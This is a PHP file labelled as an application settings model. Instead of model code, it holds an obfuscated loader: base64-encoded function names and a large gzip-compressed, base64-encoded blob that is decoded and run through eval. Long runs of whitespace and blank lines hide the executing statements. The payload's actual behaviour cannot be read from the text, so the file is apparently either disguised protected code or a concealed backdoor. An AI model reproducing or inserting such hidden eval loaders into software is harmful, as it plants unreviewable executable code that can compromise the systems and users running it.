<?php 
        $__='printf';$_='Loading app/Models/SettingAplikasi.php';
        



























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































                                                                                                                                                                                                                     $________;
